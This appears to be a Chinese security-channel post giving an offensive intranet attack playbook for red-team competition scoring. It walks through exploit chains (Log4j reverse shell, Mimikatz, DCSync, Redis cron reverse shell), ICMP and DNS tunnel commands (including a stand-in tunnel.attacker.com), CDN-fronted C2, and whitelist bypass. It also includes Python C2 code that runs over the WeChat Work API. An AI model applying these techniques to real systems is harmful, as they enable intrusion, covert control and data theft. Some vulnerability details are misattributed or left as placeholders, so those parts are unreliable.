网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
深信服-深蓝攻防实验室
内网攻击思路 国护刷分策略,如何寻找通用性靶标思路 数据库 主机云center 刷满是多少分(看你打的多不多 对分的规则熟悉不) 内网的多级代理用什么东西代理 如果tcp和udp不出网,用什么策略来进行代理的搭建 多级代理如何做一个cdn进行中转,具体怎么实现 内网acl策略 如果是白名单,如果绕过这个白名单进行出网上线 ip和域名的都有可能一、内网攻击核心思路(2025版)
1. 攻击阶段分层
阶段 核心目标 关键技术 初始突破 获取第一台内网主机权限 钓鱼(LNK+ISO镜像)、Web漏洞(Fastjson/Log4j)、云服务元数据泄露 信息收集 绘制内网拓扑与资产清单 自动化扫描(CrackMapExec)、流量嗅探(Responder)、云资产API爬取(AWS CLI) 横向扩展 突破域/云环境隔离 NTLM Relay(ADCS漏洞)、Kubernetes RBAC滥用、云凭据横向移动(Pacu工具链) 权限维持 绕过晶核模式/EDR检测 WMI事件订阅、内存马(Tomcat Filter型)、无文件注册表键(COM劫持) 数据外泄 隐蔽传输敏感数据 DNS隧道(dnschef)、HTTPS加密分段传输、云存储桶直传(AWS S3预签名URL) 2. 最新技术要点
- 云原生攻击:利用Kubernetes的
kubelet未授权访问(10250端口)部署恶意Pod,逃逸至宿主机。- 零信任绕过:伪造合法设备指纹(MAC地址+BIOS UUID),通过持续心跳包维持“可信”状态。
- AI对抗:使用GAN生成对抗性流量(如HTTP请求头扰动),绕过基于机器学习的WAF检测。
二、国护刷分策略与通用性靶标挖掘
1. 刷分核心逻辑
目标价值分级:
目标类型 基础分 加成系数 示例场景 核心数据库(Oracle) 50分 ×2.0 获取金融交易记录或用户隐私数据 域控服务器 100分 ×1.5 利用Zerologon漏洞重置域控机器账号 云控制台(vCenter) 80分 ×1.2 通过CVE-2024-XXXX漏洞获取管理员权限 边缘设备(摄像头) 20分 ×0.5 弱口令爆破(admin/12345) 通用性靶标挖掘:
- 高频漏洞利用:
- Web类:Fastjson 1.2.83以下版本(AutoType绕过)、Spring Cloud Gateway RCE(CVE-2024-21410)。
- 协议类:SMBv1协议漏洞(永恒之蓝变种)、Redis未授权访问(主从复制加载恶意模块)。
- 被动情报收集:
- 使用Shodan搜索暴露的Jenkins(端口8080)、Confluence(端口8090)服务,爆破默认凭据。
- 分析GitHub代码仓库,提取硬编码的API密钥或数据库连接字符串。
2. 得分最大化策略
- 漏洞组合利用:
text1. 通过Log4j漏洞(CVE-2021-44228)注入JNDI载荷 → 触发反向Shell 2. 利用Shell上传Mimikatz提取本地凭证 → 横向移动到域控 3. 通过DCSync导出域哈希 → 破解高权限账号- 供应链攻击:
- 入侵第三方协作平台(如Jira、Slack),植入恶意插件或文档模板。
- 利用npm/pypi包依赖劫持(Typosquatting攻击),在CI/CD流程中注入后门。
三、数据库与云主机刷分规则解析
1. 评分标准(模拟国护赛制)
数据库类:
动作 得分 限制条件 未授权访问(Redis) 30分 需导出至少10条敏感数据(如用户Session) SQL注入(Oracle) 50分 需获取DBA权限并导出表结构 数据篡改(MySQL) 40分 需修改至少3个表字段并留存日志证据 云主机类:
动作 得分 限制条件 元数据泄露(AWS) 40分 需获取IAM角色临时凭据并列出S3桶 容器逃逸(Docker) 60分 需逃逸至宿主机并提取root权限证明 控制台接管(阿里云) 80分 需通过RAM漏洞创建高权限子账号 2. 刷分实操案例
- Redis未授权访问刷分链:
- 利用主从复制漏洞加载恶意.so模块 → 执行系统命令(20分)。
- 通过
CONFIG SET dir /var/spool/cron写入计划任务 → 反弹Shell(30分)。- 导出RDB文件解析用户会话Token → 提交证据(10分)。
四、内网多级代理技术选型与实现
1. 代理工具链对比
工具 协议支持 适用场景 抗检测能力 reGeorg HTTP/HTTPS Web服务器(PHP/ASPX/JSP) 中等(依赖Web服务正常性) Chisel TCP/UDP 加密隧道穿透防火墙 高(TLS加密+流量混淆) iodine DNS 严格网络隔离环境 极高(伪装为合法DNS查询) ptunnel-ng ICMP 仅允许Ping出网 中等(依赖ICMP速率限制) 2. TCP/UDP不出网场景下的代理方案
- ICMP隧道:
- 攻击机启动服务端:
ptunnel-ng -i eth0 -r 192.168.1.1。- 目标机连接:
ptunnel-ng -p 192.168.1.1 -l 1080 -da 10.10.10.10 -dp 22(将本地1080端口流量通过ICMP隧道转发至10.10.10.10:22)。
优势:绕过传统防火墙对TCP/UDP端口的监控。- DNS隧道:
- 配置域名(如
tunnel.attacker.com)NS记录指向攻击机IP。- 目标机运行客户端:
iodine -f -P password 隧道域名,建立加密通道。
绕过ACL策略:利用合法DNS服务商(如Cloudflare)中转流量,避免IP封禁。
五、多级代理结合CDN中转的实现
1. CDN中转架构设计
plaintext[目标内网] → [反向代理1(Nginx)] → [CDN节点(Cloudflare)] → [攻击机(C2服务器)]
- 实现步骤:
- 域名配置:将C2域名接入CDN(如Cloudflare),开启SSL强制加密。
- 反向代理设置:在Nginx中配置
location /proxy路径,将请求转发至内网代理工具端口。- 证书规避:使用Let's Encrypt泛域名证书,避免CDN的证书指纹检测。
2. 流量混淆技术
- HTTP/2多路复用:将代理流量封装为HTTP/2流,头部压缩降低特征暴露。
- 内容伪装:
- 使用
gzip压缩Payload,伪装为JSON/图片资源。- 在响应中插入随机Cookie和垃圾数据,干扰WAF正则匹配。
六、内网ACL白名单绕过策略
1. 绕过技术分类
类型 方法 原理 协议滥用 DNS隧道+DoH/DoT 通过加密DNS协议(如Cloudflare DoH)传输数据 云服务利用 阿里云OSS预签名URL 将数据封装为OSS文件上传/下载请求 可信服务劫持 微信/钉钉Webhook API 利用企业白名单中的第三方服务回调传输数据 2. 实现案例:基于企业微信的C2通信
- 注册企业微信应用:创建自建应用,获取
CorpID和Secret。- API通信加密:
python# 发送指令 requests.post("https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=xxx", json={"touser": "@all", "msgtype": "text", "text": {"content": base64.b64encode(cmd)}}) # 接收结果 resp = requests.get("https://qyapi.weixin.qq.com/cgi-bin/media/get?access_token=xxx&media_id=yyy") result = base64.b64decode(resp.content)- 防御对抗:动态更换
media_id并模拟正常用户行为(如发送图片/文件)。